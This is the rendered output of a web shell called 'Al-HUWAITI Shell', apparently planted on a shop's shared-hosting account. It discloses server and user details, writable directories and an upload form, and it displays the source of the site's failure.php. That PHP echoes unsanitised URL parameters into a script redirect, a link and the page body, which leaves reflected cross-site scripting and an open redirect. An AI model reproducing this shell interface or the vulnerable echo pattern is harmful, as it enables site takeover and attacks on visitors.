Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/marisgoldunisexboutique.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/marisgoldunisexboutique.com/public_html/failure.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']); 
 include("header.php"); ?>
<title><?php echo $company_name; ?> - Error</title>
<?php
//lets us know if its coming from a legit source or someone just typed it in the address bar
if ( $_SESSION["action"] == "true" ){
	//get the necessary info for success page display
	if (isset($_GET['u']) AND isset($_GET['m'])) {
		$page_redirect = mysqli_real_escape_string($con,$_GET['u']);
		$message = mysqli_real_escape_string($con,$_GET['m']);
	}
	else{ echo "<meta http-equiv=\"refresh\" content=\"0; url=index.php\">";exit();}
}
else{ echo "<meta http-equiv=\"refresh\" content=\"0; url=index.php\">";exit();}
?>
<script>
    function startTimer(duration, display) {
        var timer = duration, minutes, seconds;
        var end =setInterval(function () {
            minutes = parseInt(timer / 60, 10)
            seconds = parseInt(timer % 60, 10);

            minutes = minutes < 10 ? "" + minutes : minutes;
            seconds = seconds < 10 ? "" + seconds : seconds;

            display.textContent = seconds;

            if (--timer < 0) {
                window.location = "<?php echo"$page_redirect"; ?>";
                clearInterval(end);
            }
        }, 1000);
    }

    window.onload = function () {
        var fiveMinutes = 8,
            display = document.querySelector('#time');
        startTimer(fiveMinutes, display);
    };
</script>
<div class="col-md-12 col-xs-12" id="cart_msg"></div>
<div class="hero-area section-bg2">
<div class="container">
<div class="row">
<div class="col-xl-12">
<div class="slider-area">
<div class="slider-height2 slider-bg4 d-flex align-items-center justify-content-center">
<div class="hero-caption hero-caption2">
<h2>Attention Required</h2>
<nav aria-label="breadcrumb">
<ol class="breadcrumb justify-content-center">
<li class="breadcrumb-item"><a href="index.php">Home</a></li>
<li class="breadcrumb-item"><a href="#"></a></li>
</ol>
</nav>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="checkout">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<span style='font-weight:700;font-size:26px;'><?php echo"$message"; ?>		<br/><br/>
				</span>
				Redirecting in <span id="time">8</span> <br/>
				<a href='<?php echo"$page_redirect"; ?>' class='button button-contactForm boxed-btn'>
					Redirect
				</a>
			</div>
		</div>
	</div>
</div>
<?php 
//set the session to false so it wont be used again.
$_SESSION["action"] = "false";
?>
<?php include("footer.php"); ?>

Al-HUWAITI Shell